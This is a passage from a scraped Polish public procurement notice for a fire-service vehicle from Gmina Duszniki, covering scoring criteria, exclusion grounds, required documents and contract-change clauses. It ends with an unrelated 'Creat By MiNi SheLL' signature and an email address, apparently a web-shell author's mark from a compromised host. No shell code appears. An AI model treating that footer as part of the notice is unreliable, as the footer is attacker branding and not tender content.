<span class="normal">XXII.	Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert: <br/>1.	Zamawiający dokona oceny ofert, które nie podlegają odrzuceniu – tj. ofert wobec, których nie zachodzą przesłanki określone w art. 226 ustawy Pzp.<br/>2.	Zamawiający dokona oceny ofert na podstawie następujących kryteriów:<br/><br/><br/>L.p.	Nazwa kryterium	Znaczenie kryterium<br/>(waga)<br/>1.	Cena (C)	60%<br/>2.	Pojemność zbiornika na wodę (ZW)	40%<br/><br/>1)	Liczba punktów w kryterium cena (C) 60%- Zamawiający zastosuje matematyczne obliczenie, ocena punktowa (maksymalnie Wykonawca może otrzymać 60 pkt) zostanie wyliczona zgodnie z następującą formułą: <br/>Proporcje matematyczne wg wzoru:<br/>C = cena najniższa/cena badanej oferty x 100  60%<br/>gdzie:<br/>C - ilość punktów<br/>Przy ocenie wysokości proponowanej ceny najwyżej będzie punktowana oferta proponująca najniższą cenę brutto wykonania przedmiotu zamówienia.<br/>Oferta o najniższej cenie brutto – maksymalna ilość punktów, pozostałe oferty – ilość punktów wyliczona według wzoru;<br/><br/>2)	Liczba punktów w kryterium pojemność zbiornika na wodę (WA) 40%- wartość punktowa (maksymalnie Wykonawca może otrzymać 40 pkt) zostanie wyliczona następująco: poszczególnym ofertom zostaną przyznane punkty za oferowaną pojemność zbiornika <br/>na wodę:<br/>a)	pojemność zbiornika na wodę do 2,7 m3 włącznie – 0 pkt,<br/>b)	pojemność zbiornika na wodę równa lub powyżej 2,7 m3 – 40 pkt.<br/><br/>3.	Punktacja przyznana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać wyjaśnień dotyczących treści złożonych ofert, w tym zaoferowanej ceny.<br/>5.	Zamawiający poprawi w ofercie:<br/>1)	oczywiste omyłki pisarskie,<br/>2)	oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>3)	inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty<br/>- niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>6.	W przypadku wystąpienia sytuacji, o której mowa w pkt 5 powyżej, Zamawiający wyznaczy Wykonawcy odpowiedni termin na wyrażenie zgody na poprawienie w ofercie omyłki lub zakwestionowanie jej poprawienia. Brak odpowiedzi w wyznaczonym terminie uznaje się za wyrażenie zgody na poprawienie omyłki.<br/>7.	Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie kryteriów oceny ofert, określonych w pkt 2 powyżej. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższa liczbę punktów (P), poprzez którą rozumie się sumę punktów przyznanych w kryterium cena <br/>i pojemność zbiornika na wodę, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + ZW<br/>gdzie:<br/>P - ilość punktów przyznanych ofercie we wszystkich kryteriach,<br/>C - ilość punktów przyznanych ofercie w kryterium cena,<br/>ZW - ilość punktów przyznanych ofercie w kryterium pojemność zbiornika na wodę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Pojemność zbiornika na wodę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.2. Wykaz podmiotowych<br/>środków dowodowych (oświadczeń) wymaganych od Wykonawcy, w celu potwierdzenia braku podstaw wykluczenia z<br/>postępowania:<br/>1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w ppkt 2.1. rozdziału XIV SWZ<br/>oraz w zakresie podstaw wykluczenia wskazanych w art. 109 ust.<br/>1 pkt 4 ustawy Pzp, którego wzór stanowi załącznik nr 4 do SWZ;<br/>2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej: składa oświadczenie, o<br/>którym mowa w ppkt 3.2.1) rozdziału XIV SWZ;<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie,<br/>o którym mowa w ppkt. 3.2.1) rozdziału XIV SWZ, składa odrębnie każdy z Wykonawców;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 2.5. Do oferty Wykonawca dołącza następujące przedmiotowe środki dowodowe:<br/>1) Zamawiający wymaga w niniejszym postępowaniu przedmiotowego środka dowodowego<br/>w postaci wypełnionej i załączonej do oferty tabeli pn. Opis oferowanych parametrów, której wzór stanowi załącznik nr 1 do<br/>Formularza Oferty wraz z dokumentami wymienionymi w opisie oferowanych parametrów, w tym:<br/>􀀁􀀁 aktualne i ważne świadectwo dopuszczenia/certyfikat do użytkowania w ochronie przeciwpożarowej na terenie Polski<br/>wydane na podstawie rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20.06.2007 r. w sprawie wykazu<br/>wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad<br/>wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U.<br/>z 2007 r. Nr 143, poz. 1002, z późn. zm) – powyższe dotyczy również sprzętu dostarczonego z oferowanym pojazdem, jeśli<br/>jest dla niego wymagane świadectwo dopuszczenia;<br/>􀀁􀀁 w przypadku pojazdu sprowadzonego z zagranicy, aktualną opinię techniczną w zakresie spełnienia wymagań<br/>technicznoużytkowych,<br/>wydaną przez Centrum Naukowo-Badawcze Ochrony Przeciwpożarowej – PIB w Józefowie, na podstawie<br/>rozporządzenia Ministra Spraw Wewnętrznych i Administracji z 21.10.2020 r. w sprawie wprowadzania do użytkowania w<br/>jednostkach ochrony przeciwpożarowej pojazdów pożarniczych używanych poza granicami kraju (Dz.U. z 2020 r., poz.<br/>1878);<br/>Zamawiający na podstawie ww. dokumentów dokona oceny zgodności oferowanego pojazdu<br/>z minimalnymi wymaganiami Zamawiającego zawartymi w szczegółowym opisie przedmiotu zamówienia, stanowiącym<br/>załącznik nr 1 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 2.5. Do oferty Wykonawca dołącza następujące przedmiotowe środki dowodowe:<br/>1) Zamawiający wymaga w niniejszym postępowaniu przedmiotowego środka dowodowego<br/>w postaci wypełnionej i załączonej do oferty tabeli pn. Opis oferowanych parametrów, której wzór stanowi załącznik nr 1 do<br/>Formularza Oferty wraz z dokumentami wymienionymi w opisie oferowanych parametrów, w tym:<br/>􀀁􀀁 aktualne i ważne świadectwo dopuszczenia/certyfikat do użytkowania w ochronie przeciwpożarowej na terenie Polski<br/>wydane na podstawie rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20.06.2007 r. w sprawie wykazu<br/>wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad<br/>wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U.<br/>z 2007 r. Nr 143, poz. 1002, z późn. zm) – powyższe dotyczy również sprzętu dostarczonego z oferowanym pojazdem, jeśli<br/>jest dla niego wymagane świadectwo dopuszczenia;<br/>􀀁􀀁 w przypadku pojazdu sprowadzonego z zagranicy, aktualną opinię techniczną w zakresie spełnienia wymagań<br/>technicznoużytkowych,<br/>wydaną przez Centrum Naukowo-Badawcze Ochrony Przeciwpożarowej – PIB w Józefowie, na podstawie<br/>rozporządzenia Ministra Spraw Wewnętrznych i Administracji z 21.10.2020 r. w sprawie wprowadzania do użytkowania w<br/>jednostkach ochrony przeciwpożarowej pojazdów pożarniczych używanych poza granicami kraju (Dz.U. z 2020 r., poz.<br/>1878);<br/>Zamawiający na podstawie ww. dokumentów dokona oceny zgodności oferowanego pojazdu<br/>z minimalnymi wymaganiami Zamawiającego zawartymi w szczegółowym opisie przedmiotu zamówienia, stanowiącym<br/>załącznik nr 1 do SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3. Ofertę składa się na Formularzu Oferty (wraz z załącznikiem nr 1 do formularza tj. Opis oferowanych parametrów),<br/>którego wzór stanowi załącznik nr 2 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenie, o którym mowa pkt 2 rozdziału XIV SWZ – tj. oświadczenie według wzoru załącznika nr 3 do SWZ,<br/>2) przedmiotowe środki dowodowe, o których mowa w pkt 2.5 rozdziału XIV SWZ,<br/>3) dokumenty potwierdzające posiadanie pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych<br/>dokumentów rejestrowych (tzn. odpowiednie pełnomocnictwa – jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> XI. Informacja dla Wykonawców wspólnie ubiegających się o udzielnie zamówienia:<br/>1. Wykonawcy mogą wspólnie (np. konsorcja, spółki cywilne) ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielnie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielnie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Uwaga ! Pełnomocnictwo powinno być załączone do oferty. Pełnomocnictwo składa się<br/>w oryginale, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby udzielającej pełnomocnictwa lub w<br/>postacie elektronicznej kopii dokumentu, poświadczonej za zgodność z oryginałem przez notariusza, tj. opatrzona<br/>kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>2. Zapis z pkt 2 powyżej nie dotyczy sytuacji, w której upoważnienie/pełnomocnictwo do występowania w imieniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia wynika z dołączonej do oferty umowy regulującej<br/>współpracę Wykonawców – wówczas umowa winna być załączona do oferty w formie elektronicznej/postaci<br/>elektronicznej/postaci elektronicznej kopii dokumentu opatrzonej właściwymi podpisami wym. w uwadze pkt 2 powyżej, bądź<br/>wszyscy wspólnicy podpiszą ofertę.<br/>3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia (tj. przez każdego z Wykonawców<br/>lub pełnomocnika).<br/>4. Przepisy ustawy Pzp i postanowienia niniejszej SWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, w szczególności:<br/>1) oświadczenia i dokumenty (podmiotowe i przedmiotowe środki dowodowe), o których mowa w rozdziale XIV SWZ, składa<br/>każdy z Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia; oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5. W przypadku gdy Zamawiający będzie wymagał wniesienia wadium, dopuszcza się, aby wadium zostało wniesione przez<br/>pełnomocnika (lidera) lub jednego z Wykonawców wspólnie ubiegających się o udzielnie zamówienia.<br/>6. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 445 ust. 1 ustawy Pzp, ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 7<br/>1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Dopuszcza się możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, mających na celu prawidłową realizację przedmiotu zamówienia, w następujących przypadkach:<br/>1) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy – w<br/>zakresie objętym zmianą, w szczególności<br/>w zakresie zmiany stawki podatku VAT;<br/>2) gdy zmiany będą korzystne dla Zamawiającego i będą leżały w interesie publicznym;<br/>3) dopuszcza się poprawę omyłek pisarskich i rachunkowych w treści umowy;<br/>4) innych warunków umowy, jeżeli w chwili jej zawarcia nieznane były fakty mające na nie wpływ, przy jednoczesnym<br/>założeniu, że zakres spowoduje następstwa korzystne dla Zamawiającego,<br/>5) dopuszcza się zmianę terminu wykonania umowy, poza sytuacjami określonymi wyżej, również w przypadkach:<br/>􀀁􀀁 działania siły wyższej, klęski żywiołowej, nietypowych zjawisk atmosferycznych, sytuacji nadzwyczajnych np.<br/>ogłoszenia<br/>stanu epidemii, zagrożenia epidemicznego, stanu wyjątkowego – termin wykonania przedmiotu umowy może wówczas<br/>zostać przedłużony o czas trwania okoliczności, które znacznie utrudniają lub uniemożliwiają realizację umowy w pierwotnie<br/>założonym terminie;<br/>􀀁􀀁 wystąpienia okoliczności niezależnych od Wykonawcy (przy zachowaniu przez niego należytej staranności),<br/>skutkujących<br/>niemożliwością dotrzymania terminu zakończenia przedmiotu umowy – o czas trwania tych okoliczności;<br/>6) wynagrodzenie należne wykonawcy może ulec zmianie w przypadku zmiany:<br/>􀀁􀀁 stawki podatku od towarów i usług – wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie<br/>wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów;<br/>3. W razie wątpliwości, przyjmuje się, że nie stanowią zmiany niniejszej umowy następujące zmiany:<br/>a) danych teleadresowych;<br/>b) danych rejestrowych;<br/>c) będące następstwem sukcesji uniwersalnej po jednej ze stron niniejszej umowy.<br/>O powyższych zmianach Strona umowy, której zmiany dotyczą zobowiązuje się powiadomić pisemnie drugą Stronę.<br/>4. Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do udokumentowania zaistnienia<br/>okoliczności, o których mowa w ust. 2. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.<br/>5. Zmiany umowy wymaga formy pisemnej pod rygorem nieważności.<br/>6. Warunkiem wprowadzenia zmian do umowy jest zgoda obu stron umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_duszniki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę/Wykonawców<br/>w przypadkach, o których mowa w art. 108 ust. 1 ustawy Pzp (przesłanki wykluczenia obligatoryjne), oraz na podstawie art.<br/>7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U.<br/>z 2022r. poz. 835 ze zm.) – przesłanki wykluczenia obligatoryjne.<br/>4. W przypadku Wykonawcy lub wykluczonego na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (t.j. Dz. U. z 2022r. poz. 835 ze zm.), zastosowanie mają przepisy art. 7 ust. 2-9 niniejszej ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com